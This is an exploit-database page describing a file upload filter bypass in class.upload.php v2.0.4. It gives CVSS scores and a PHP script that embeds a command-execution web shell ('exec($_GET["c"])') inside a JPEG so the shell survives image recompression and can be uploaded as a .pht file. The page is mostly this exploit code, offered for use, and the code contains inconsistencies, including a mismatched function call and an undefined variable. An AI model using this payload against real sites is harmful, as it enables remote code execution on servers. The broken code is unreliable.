class.upload.php v.2.0.4 Remote File Upload Vulnerability

2021.04.03
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Remote File Upload Vulnerability - class.upload.php v.2.0.4 # Date: 03/04/2021 # Exploit Author: Tobias Marcotto # Tested on: Kali Linux x64 # Version: 2.0.4 # Description: This is a filter bypass exploit that results in arbitrary file upload and remote code execution ********************************************************************************************************* <?php ini_set('display_errors', 1); error_reporting(E_PARSE); #requires php, php-gd $orig = 'image.jpg'; $code = '<?=exec($_GET["c"])?>'; $quality = "85"; $base_url = "http://lorempixel.com"; $output = 'image.jpg.pht'; echo "-=Imagejpeg injector 1.8=-\n"; do { $x = 100; $y = 100; $url = $base_url . "/$x/$y/"; echo "[+] Fetching image ($x X $y) from $url\n"; file_put_contents($orig, file_get_contents($url)); } while(!tryInject($orig, $code, $quality)); echo "[+] It seems like it worked!\n"; echo "[+] Result file: $output\n"; function tryInject($orig, $code, $quality, $output) { $tmp_filename = $orig . '_mod2.jpg'; //Create base image and load its data $src = imagecreatefromjpeg($orig); imagejpeg($src, $tmp_filename, $quality); $data = file_get_contents($tmp_filename); $tmpData = array(); echo "[+] Jumping to end byte\n"; $start_byte = findStart($data); echo "[+] Searching for valid injection point\n"; for($i = strlen($data)-1; $i > $start_byte; --$i) { $tmpData = $data; for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n) { $tmpData[$n] = $code[$z]; } $src = imagecreatefromstring($tmpData); imagejpeg($src, $output, $quality); if(checkCodeInFile($result_file, $code)) { unlink($tmp_filename); unlink($result_file); sleep(1); file_put_contents($result_file, $tmpData); echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n"; sleep(1); $src = imagecreatefromjpeg($result_file); return true; } else { unlink($output); } } unlink($orig); unlink($tmp_filename); return false; } function findStart($str) { for($i = 0; $i < strlen($str); ++$i) { if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA) { return $i+2; } } return -1; } function checkCodeInFile($file, $code) { if(file_exists($file)) { $contents = loadFile($file); } else { $contents = "0"; } return strstr($contents, $code); } function loadFile($file) { $handle = fopen($file, "r"); $buffer = fread($handle, filesize($file)); fclose($handle); return $buffer; }


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top